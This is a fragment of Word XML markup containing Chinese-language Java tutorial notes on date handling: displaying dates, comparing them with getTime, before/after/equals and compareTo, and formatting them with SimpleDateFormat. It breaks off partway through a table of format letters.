      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> toString() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数显示日期时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E2EDF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       System.out.println(date.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CF0AD9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDFE793" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC3A37C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日期比较</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02637E8D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用以下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>三种方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来比较两个日期：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFAAB09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54803A82" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> getTime() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法获取两个日期（自</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1970</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日经历的毫秒数值），然后比较这两个值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56516D95" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> before()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">after() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。例如，一个月的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>号比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>号早，则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> new Date(99, 2, 12).before(new Date (99, 2, 18)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE5DD9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> compareTo() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，它是由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Comparable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口定义的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Date </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类实现了这个接口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697302B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C3BC892" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化时间：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SimpleDateFormat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8A7BAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import  java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B798C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import java.text.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296BF616" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCC78E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public class DateDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1846A6EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697EEC13" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45337928" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      Date dNow = new Date( );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BBCEB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      SimpleDateFormat ft = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>new SimpleDateFormat ("yyyy-MM-dd hh:mm:ss");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F644DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BC617F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前时间为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: " + ft.format(dNow));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F51A1A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F756E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD8E57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这一行代码确立了转换的格式，其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> yyyy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是完整的公元年，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是月份，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">dd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是日期，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HH:mm:ss </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是时、分、秒。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DAA92C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0398E9B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>有的格式大写，有的格式小写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> MM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是月份，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">mm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 24 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小时制，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> hh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小时制。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9925" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1899"/>
        <w:gridCol w:w="4344"/>
        <w:gridCol w:w="3682"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C452C" w14:paraId="240AE73A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1C4A8DD0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>字母</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="732F1BDB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="714CA2B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>示例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="3335F0AC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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51555E15"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G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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53072671"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纪元标记</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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545A9C95"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AD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="6D5CF2F8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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375EC995"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y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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4A681D77"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四位年份</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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173F2AE3"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2001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="26448007" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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21E21041"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M</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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78964056"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月份</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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372F2252"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July or 07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="5D8591F2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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2CF05706"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d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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1B4749CA"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一个月的日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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18E67E3C"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="00B35837" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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683CDC0F"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h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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01D321EA"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 A.M./P.M. (1~12)格式小时</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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1BC8C828"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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="246241CF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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7B4BEA80"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H</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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2A703D5E"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一天中的小时 (0~23)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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2EEF10BF"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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="04152386" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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6883748B"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m</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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161AEA3D"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分钟数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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2198F5A9"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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="4CE0E3EA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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3A0077F7"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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>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3F06FF9E"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秒数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>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0A8935C8"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55</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="19571B12" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792" w:type="dxa"/>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6A9472EE"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lastRenderedPageBreak/>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
